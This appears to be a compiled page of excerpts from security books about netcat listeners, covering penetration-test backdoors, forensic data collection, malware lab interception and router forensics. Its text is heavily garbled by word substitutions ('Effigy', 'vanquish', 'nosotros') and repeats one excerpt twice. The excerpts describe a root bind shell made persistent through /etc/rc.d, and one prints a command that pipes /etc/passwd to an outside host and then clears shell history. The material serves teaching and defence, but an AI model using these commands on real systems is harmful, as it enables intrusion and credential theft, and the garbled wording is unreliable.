Netcat Listener

Maintaining Access

Thomas Wilhelm , in Professional person Penetration Testing, 2010

Netcat Trounce

Effigy thirteen.2 is a graphic representation of a shell connexion, using netcat. In this example, the exploited system has netcat running in a listening manner. To create the communication channel, we connect with our attack organization to the listening netcat application.

Figure 13.2. Netcat Shell

To use netcat every bit a backdoor, we need to have a way to direct all advice through netcat into a vanquish or command prompt. If nosotros await at Figure 13.3, nosotros see the results of an Nmap scan against the Hackerdemia server, which has numerous ports bachelor in which to connect.

FIGURE thirteen.3. Nmap Scan of Hackerdemia Server

The port nosotros volition wait at for this chapter is port 1337, identified equally "waste," according to Nmap. In actuality, it is netcat prepare to listen for an incoming connectedness, which would then launch a crush when a connection request is received. In Figure thirteen.4, nosotros see that netcat has been configured to execute a shell using the "-e" option. This vanquish is launched when the system boots up, because it is in the /etc/rc.d binder. This provides assurance that our backdoor will be available fifty-fifty if the system is rebooted by the server's system administrator.

Effigy 13.4. Backdoor Using Netcat

Annotation

The netcat listener located on the Hackerdemia LiveCD server is already installed so that we can play with it. If we wanted to create our own listener for practice purposes, that's definitely a benign exercise.

When a connection is made, netcat will execute the bash shell, assuasive us to collaborate with the system. Permissions on Linux systems (also every bit Microsoft Windows) are transferred whenever a process is launched; in our example, the fustigate beat will inherit the same permissions of whoever started the netcat process, which was the system itself. This is of import to remember, because these permissions may prevent the execution of the desired awarding, depending on what rights the netcat awarding inherits. In our example, information technology will be equally the user "root."

At present that we know there is a netcat listener running on the arrangement, we tin utilize our attack server to communicate with our target. Once connected, we can brainstorm to result commands through the bash beat programme. The connection process is straightforward – we simply launch netcat to connect to 192.168.i.123, as seen in Effigy 13.five. Notice that there are no prompts indicating success or failure – all we receive upon connexion is a blank line. However, if nosotros start typing in commands, we will encounter that we will get proper replies.

Effigy xiii.v. Backdoor Connectedness Using Netcat

To verify that nosotros have connected to the target system (192.168.ane.123), the ifconfig output is provided in Figure xiii.v. Again, information technology is important to remember that permissions are inherited. In this case, because netcat was launched during bootup, nosotros have root privileges, equally mentioned previously, and every bit illustrated by the whoami control. We now have a backdoor that will be accessible as long as the startup script is running.

Tools and Traps…

Where Is My Command Prompt?

The absence of any prompt when using netcat to spawn a control vanquish is a surprise when beginning used and difficult to adjust to. The absence of a command prompt is because the prompt configuration is not inherited beyond different displays, in this case our remote display. Instead, you volition only encounter a blank line waiting for input. In the commencement, you might find yourself waiting for something to happen, just to finally realize that everything is working like it should.

Read full chapter

URL:

https://www.sciencedirect.com/science/commodity/pii/B978159749425000018X

Incident Response

In The Official CHFI Study Guide (Test 312-49), 2007

Collecting Volatile Data

When the start responder arrives, they tin can attempt to collect volatile data from the powered-on machine. Volatile information is data that is only present when the machine is turned on. If a network intrusion has occurred, the attacker may yet have connections established. Many organizations take their own trusted toolset for collecting volatile data. In one case y'all have collected volatile information, you should hash the files and tape the hash values in your notes. All nerveless information must be put on forensically make clean media. The netcat tool is often used to collect volatile data over a network.

Responder Reckoner: Setting up Netcat Listener

Starting on the incident responder's collection estimator, we will start a Netcat listener. The starting time command sets upwardly a Netcat listener on TCP port 4444. Data received will exist redirected to forensically clean media on the Chiliad: drive.

Victim Computer: Sending Volatile Data with Netcat

The adjacent control is issued from the victim computer. This step sends Internet Protocol (IP) configuration data to the outset responder's workstation.

Responder Computer: Verifying and Hashing

Next we verify and and then hash the data. The type command is used to verify the results from the Netcat transfer and MD5deep is utilized to hash the information. The type command is too used to verify the hash value. It is important to redirect the hash output to a new file. In the case below, ipccnfig.txt was hashed and the results were redirected to ipconfig. md5.

Automated Volatile Data Collection Tools

Automatic incident response scripts offering a speed advantage over manually typing in commands. Many organizations have a custom software tool belt for incident response. Many of the tools incorporate static binaries, which are compiled to be totally self contained when operating. The static binaries are preferred because they tend non to trample on evidence. In that location are many tools, such every bit E-Fense's alive CD Helix, that an organization may employ as an incident response tool to collect volatile data (see Figure 15.10).

Effigy fifteen.10. Efense'south Helix Incident Response CD

Read total chapter

URL:

https://www.sciencedirect.com/science/article/pii/B978159749197650016X

Analysis of a Malware Specimen

Cameron H. Malin , ... James Yard. Aquilina , in Malware Forensics Field Guide for Linux Systems, 2014

Using a Netcat Listener

▸ An alternative method that can be used to intercept the contents of Web requests and other network connections is to establish a netcat listener on a dissimilar host in the laboratory network.

Call up from previous chapters that netcat is a powerful networking utility that reads and writes data beyond network connections over TCP/IP or User Datagram Protocol (UDP). 66

This is particularly helpful for establishing a network listener on random TCP and UDP ports that a suspect program uses to connect. netcat is a favorite tool among many digital investigators due to its flexibility and diverseness of use, and because information technology is often natively installed on many Linux distributions. There is also a Windows port available for download. 67

Upon learning the remote port the suspect program is requesting to connect to, the digital investigator tin can apply netcat by establishing a netcat listener on the target port of the Linux server host in the malware laboratory.

Using the example in Effigy 6.25, the suspect program is requesting to download files from a Web server over port 80; to constitute a netcat listener on port 80 of the Linux server, use the nc control with the —v (verbose) —50 (heed) —p (port) switches and identify the target port number. (The —v switch is not required and simply provides more verbose output, as shown below in Figure 6.26).

FIGURE 6.26. Establishing a netcat listener for the purpose of collecting network impression show

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9781597494700000061

Netcat Penetration Testing Features

In Netcat Power Tools, 2008

System B - The System on the Outside of the Firewall

The office of System B is to listen on all and whatever ports for incoming connections and if received, transport a response packet dorsum to our internal system. To decide what TCP and UDP ports nosotros can connect to, we want to configure our external arrangement to listen on all 65,535 TCP and UDP ports.

It is not realistic to open up 131,070 ports using carve up Netcat listeners. Instead, nosotros can configure Netcat to listen on 2 ports, one for TCP connections and the other for UDP connections. We can then utilize our ain packet-filtering device to essentially port forward all TCP connections to our TCP Netcat listener, and all UDP traffic to our UDP Netcat listener.

For this example, Organisation B is running Gentoo Linux configured to employ Iptables, which will perform our port forwarding function. The TCP Netcat listener is configured to accept connections on TCP/1234, and the UDP listener volition accept connections on UDP/1234.

Note

For data regarding the installation and kernel configuration required to run Iptables on the Gentoo Linux platform, reference the following link: http://gentoo-wiki.com/HOWTO_Iptables_for_newbies

For general information on Iptables you tin also visit http://www.netfilter.org/.

After System B is configured to use Iptables, we need to add some rules to redirect the incoming traffic to the appropriate Netcat listeners. To implement this function nosotros will use the following Iptables commands:

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 1:65535 -j REDIRECT --to-port 1234

iptables -t nat -A PREROUTING -i eth0 -p udp --dport 1:65535 -j REDIRECT --to-port 1234

To verify the rules are loaded into Iptables, type the following command:

iptables –L –n –t nat

Figure two.v. Lists the Iptables Rules

In one case Iptables is configured properly, we tin can start our two Netcat listeners using the following commands in separate terminals.

nc –fifty –p 1234

nc –u –l –p 1234

At this signal, Organization B is set and gear up to accept connections on all 65,535 TCP ports, and all 65,535 UDP ports tin can fix upward the organisation on the internal network (Organization A).

Read total chapter

URL:

https://www.sciencedirect.com/scientific discipline/article/pii/B9781597492577000029

Analysis of a Suspect Plan

James M. Aquilina , in Malware Forensics, 2008

Using a Netcat Listener

Although we ready upward a Spider web server to facilitate the environment required past the suspect program, an alternative method that can exist used to intercept the contents of Web requests and other network connections is to institute a netcat listener on a different host in the laboratory network. Remember from previous capacity that netcat is a powerful networking utility that reads and writes data across network connections over TCP/IP or User Datagram Protocol (UDP). 43 This is specially helpful for establishing a network listener on random TCP and UDP ports that a suspect program uses to connect. Netcat is a favorite tool among many digital investigators, due to its flexibility and diversity of use, and considering it is often natively installed on many Linux distributions. Windows users, have no fear—at that place is also a Windows port available for download. 44

In this instance, because we know that the suspect program is requesting to download files from a Web server over port fourscore, nosotros can establish the listener on port 80 of our "remote" host in the malware lab. To listen on port 80, use the nc command with the —v (verbose) —l (heed) —p (port) switches. (The —five switch is not required and simply provides more verbose output, equally shown beneath in Effigy 9.xviii.)

Figure 9.18. Establishing a Netcat Listener to Intercept Web Requests Made by the Specimen

During the form of runtime, our doubtable program likewise makes a similar request to resolve a domain name relating to an online free Web-based electronic mail service, which, after being resolved, requests a postal service server. Nevertheless, afterward providing the specimen with a postal service server (netcat can too exist used to facilitate this purpose past establishing a listener on port 25), the captured contents are minimal and simply consist of a connection and reset. With no payload or boosted details, it is hard to decipher the purpose of the requested connexion (come across Figure 9.xix).

Effigy nine.19. Mail Server Requests Made by the Specimen

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9781597492683000098

The Dark Side of Netcat

In Netcat Ability Tools, 2008

Netcat on Windows

All of the examples I have given here have been within the Linux operating system. For those who are attacking systems that use ane of Microsoft'south Windows operating systems, either as a target or attack platform, all the techniques in hither will be identical with i very useful departure—the -L selection. When you use this flag, you can retain access to the netcat listener fifty-fifty after yous have disconnected with the compromised system. This is beneficial, since it eliminates additional organization modifications or scripts needed to keep netcat alive, as required by Linux.

There is a downside to this, though. If you demand to hide netcat past renaming it to something more than common, you stand out more when you utilize flags not normally associated with whatever application you are trying to disguise yourself equally. This is a minor irritant, though, and rarely something that would exist much of a business organization. Otherwise, this chapter can apply the examples interchangeably with the windows version of netcat.

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9781597492577000054

Local System Attacks

Thomas Wilhelm , in Professional Penetration Testing (Second Edition), 2013

Netcat Beat

Effigy 9.xviii is a graphic representation of a shell connexion, using netcat. In this example, the exploited system has netcat running in a listening mode. To create the advice channel, we connect with our assail system to the listening netcat application.

Effigy 9.eighteen. Netcat shell.

To employ netcat as a backdoor, we need to accept a mode to direct all communication through netcat into a vanquish or command prompt. If we look at Figure 9.nineteen, nosotros see the results of an Nmap browse against the Hackerdemia server, which has numerous ports bachelor in which to connect.

Figure 9.19. Nmap browse of Hackerdemia server.

The port nosotros will look at for this chapter is port 1337, identified as "waste," according to Nmap. In actuality, it is netcat gear up to listen for an incoming connection, which would then launch a beat when a connexion asking is received. In Figure 9.20, we run into that netcat has been configured to execute a shell using the "-e" option. This trounce is launched when the organization boots up, because information technology is in the /etc/rc.d folder. This provides assurance that our backdoor will be available even if the system is rebooted by the server's organisation administrator.

Figure nine.20. Backdoor using netcat.

Annotation

The netcat listener located on the Hackerdemia LiveCD server is already installed and so that we can play with it. If nosotros wanted to create our ain listener for exercise purposes, that's definitely a beneficial practice.

When a connection is fabricated, netcat will execute the bash shell, allowing us to interact with the arrangement. Permissions on Linux systems (likewise as Microsoft Windows) are transferred whenever a process is launched; in our instance, the bash shell will inherit the same permissions of whoever started the netcat process, which was the system itself. This is important to call up because these permissions may prevent the execution of the desired awarding depending on what rights the netcat application inherits. In our instance, information technology will be equally the user "root."

Now that we know there is a netcat listener running on the organization, we can utilise our set on server to communicate with our target. Once connected, we tin can brainstorm to upshot commands through the fustigate crush programme. The connection procedure is straightforward—we simply launch netcat to connect to 192.168.i.123 as seen in Figure nine.21. Notice that there are no prompts indicating success or failure—all nosotros receive upon connection is a blank line. However, if we start typing in commands, we will run across that nosotros will get proper replies.

Figure nine.21. Backstairs connectedness using netcat.

To verify that we accept connected to the target system (192.168.1.123), the ifconfig output is provided in Figure 9.21. Again, it is of import to call up that permissions are inherited. In this example, because netcat was launched during bootup, we have root privileges, as mentioned earlier and as illustrated by the whoami command. We now have a backdoor that volition exist attainable as long as the startup script is running.

Tools and Traps

Where Is My Command Prompt?

The absenteeism of any prompt when using netcat to spawn a command beat out is a surprise when outset used and hard to adapt to. The absence of a control prompt is because the prompt configuration is not inherited across unlike displays, in this case our remote brandish. Instead, you will only see a blank line waiting for input. In the beginning, you lot might discover yourself waiting for something to happen, only to finally realize that everything is working like information technology should.

Read total chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9781597499934000094

Malware Incident Response

Cameron H. Malin , ... James M. Aquilina , in Malware Forensics Field Guide for Linux Systems, 2014

Local vs. Remote Drove

Choose the manner in which y'all will collect data from the subject arrangement.

Collecting results locally means you are connecting external storage media to the bailiwick arrangement and saving the results to the connected media.

Remote collection means that you are establishing a network connexion, typically with a netcat or cryptcat listener, and transferring the acquired organization data over the network to a collection server. This method reduces system interaction but relies on the ability to traverse the subject network through the ports established by the netcat listener.

Additional remote forensic utilities such as F-Response and FTK have some capabilities to support volatile data collection and are discussed in the Tool Box Appendix

Investigative Considerations

In some instances, the subject network will have rigid firewall and/or proxy server configuration, making information technology cumbersome or impractical to plant a remote collection repository.

Remotely acquiring sure data during alive response—like imaging a subject organisation's physical memory—may be time- and resource-consuming and crave several gigabytes of data to traverse the network, depending on the amount of random access memory (RAM) in the target system. The following pair of commands depicted in Figure 1.i, sends the output of a live response utility acquiring data from a subject area organisation to a remote IP address (172.16.131.32) and saves the output in a file named "<toolname>20131023host1.txt" on the collection system.

FIGURE ane.1. Netcat commands to establish a network listener to collect tool output remotely

The netcat command must exist executed on a collection system starting time so that information technology is ready and waiting to receive data from the subject arrangement.

Local drove efforts can be protracted in instances where a victim organisation is older and contains obsolete hardware, such equally USB ane.one, which has a maximum transfer rate of 12 megabits per second (mbps).

Always ensure that the media you are using to acquire live response data are pristine and do not contain unrelated case data, malicious code specimens, or other artifacts from previous investigations. Acquiring digital evidence on "dirty," or compromised media, can taint and undermine the forensic soundness of the acquired data.

Read total chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9781597494700000012

Understanding the Methods and Mindset of the Assailant

Dale Liu , in Cisco Router and Switch Forensics, 2009

Netcat

If yous are a computer utility or tool hound, you demand to make certain yous have netcat (also referred to as nc) as function of your tool set if you lot don't have it already. Netcat is a popular open source tool that is used primarily to read and write data over a network easily. Information technology can likewise be used by naughty hackers to gain access to systems, or to prepare themselves up as "listeners."

Although netcat can be used every bit a listener, information technology is of import to know that its capability extends beyond this feature. It tin can likewise be used to motion files and it can operate every bit a network scanner through a simple option of switches and flags. In this section, I will demonstrate its employ as a connectedness tool.

More often than not, netcat is used in several ways, just mainly it is used as a transmitting process to brand a connexion equally a client, or as a listener, like a mini server of sorts. Indeed, netcat is very versatile and will permit information to be piped into and out of it. For instance, if I were going to gear up a netcat listener on my computer to retrieve data that I knew would be coming to me from my evil twin, I would invoke netcat in the following way:

#netcat –50 L –p 8888 > ~/stolen_passwords.txt

This would let my computer to listen for network traffic on port 10022 and direct the output (which I take planned volition exist a countersign list coming from my evil twin). On the other mitt, say that my evil twin has penetrated the physical barriers of his target and, using his leet Ninja skills, got into the network data center facility and ran the following on the UNIX server:

#cat /etc/passwd | netcat site.goodytwoshoes.net –p 8888 && history -c

As you tin run across, my twin is really evil: He entered a command to listing the contents of a UNIX countersign file from the /etc folder, and piped the output into the netcat program that will connect to the same port I am running on my listener organisation. When the command executes successfully, he volition wipe out all recent commands from the command execution history, which is a subject area we will get into later.

In Figure 7.3, you lot can see a variation of my control ready every bit a listener on the organisation, where I refer to the localhost (as in 127.0.0.1); when a connexion is made, a beat out is passed to whomever connects to information technology. Toward the bottom of the figure, you can see the report stating that it is listening on port 8888, and the ps-aux reports stating that this procedure is running with a procedure identification number (PID) of 4203. In addition, I brought up an lsof –ni to "list open files, Cyberspace-related, in numerical class," and yous can see the port it is listening on if you did not know whether the original command was running.

Figure 7.3. Netcat Running in the Background

It should be articulate from this screen that a netcat process was running after nosotros executed a ps –aux|grep nc. You should as well get a scare from the listening open file in the lsof –ni output, every bit it shows a port that is open and that belongs to the netcat process, with a PID of 4203. Also remember that not all hacker tools are named "netcat" or "nc." (Especially remember that not all flavors of UNIX will have the process list command ps with an –aux switch or lsof –ni; check your man page for specifics.)

This kind of stuff happens every day on thousands of computers around the globe. Some programs out there are based on the functionality of netcat, which had been configured in a number of ways ranging from keystroke recording to total-on data exfiltration. At this point, y'all should be thinking of ii things. The first concerns some of the malicious tactics people will use to exploit computers and defeat information security. The second concerns the sources of data you can admission to determine why a figurer is "acting funny." A really brilliant guy I worked with awhile agone said that in that location isn't a "Become Easy button"; that means you demand to recollect the points we covered in the section, summarized as follows:

Utilise tools that list the running (or otherwise) processes.

Decide what network ports are in a listening or transmitting state.

Sympathise what is considered a normal condition on the systems you supervise and so that you tin can easily determine whether something is truly out of the ordinary.

Read full affiliate

URL:

https://www.sciencedirect.com/science/article/pii/B9781597494182000077

Reporting Results

Thomas Wilhelm , in Professional Penetration Testing, 2010

Aggrandize Your Skills

Want to know about reporting results? The following exercises are intended to provide yous with additional knowledge and skills, so you can empathize this topic better. Utilise your lab to conduct the following exercises.

EXERCISE 15.ane

Create a Simple Penetration Exam Study

i.

Search the Cyberspace for ideas on what a professional person penetration examination report should wait similar. Provide the uniform resources locator (URL) of at least two examples.

2.

Create a reporting template, using either Microsoft Word or OpenOffice. The template should include a title folio, an executive report page, a main torso of text, a determination, appendix a, appendix b, and a reference page. Personalize the study to your own satisfaction; do not utilise the examples found in stride one.

3.

Using the architecture illustrated in Affiliate thirteen, in Figure 13.10, describe the architecture. Include all identified communication ports available on the Hackerdemia server and host firewall configurations (seen in Figure xiii.12 ). Omit the netcat listeners from the description. Add the compages description to the main trunk of text in your report.

4.

Provide a high-level assay of at least v different communication ports found on the Hackerdemia server. Provide a bulleted list of your findings and an boosted bulleted listing of ways to mitigate the five communication ports. Include at to the lowest degree two different mitigation options for each port.

5.

Presume that a reverse netcat shell was installed on the Hackerdemia server, as illustrated in Figure thirteen.eleven, using social applied science. Create a scenario describing the exploit at a high level – the description should be at least 2 paragraphs. Add your finding to those listed in bullet format in step 4.

half dozen.

Provide at least 3 ways to mitigate the vulnerability detailed in step 5, and add them as a bulleted listing to the primary trunk of text, as described in pace 4.

7.

Write a determination, explaining the overall risk of the Hackerdemia server, based on your findings.

8.

Recreate the Secure Vanquish (SSH) opposite beat out, described in Chapter thirteen and illustrated in Figure 13.6. Record all keystrokes using the script application, saving them to a file. Add the script output to appendix A of your report.

9.

Create a list of acronyms used in your report. Add them to appendix B.

10.

Find references on the Cyberspace related to your findings from pace four and step 5.

Do 15.2

Create Metrics

1.

Based on the information gathered in Exercise fifteen.1, provide a decision tree analysis nautical chart describing your mitigation suggestions.

2.

Perform a Nessus scan against the Hackerdemia server. Create a sensitivity matrix, using at least 5 dissimilar findings. Utilise "time to mitigate" every bit the affect measurement.

EXERCISE xv.3

Submit Your Written report for Peer Review

1.

Go to http://forums.heorot.net and submit your report in the "Affiliate 15" forum, located in the "Professional Penetration Testing Book" section.

2.

Perform a peer review on a report already submitted and post your response as a answer. Exist constructive in your comments.

Read total chapter

URL:

https://www.sciencedirect.com/science/article/pii/B978159749425000021X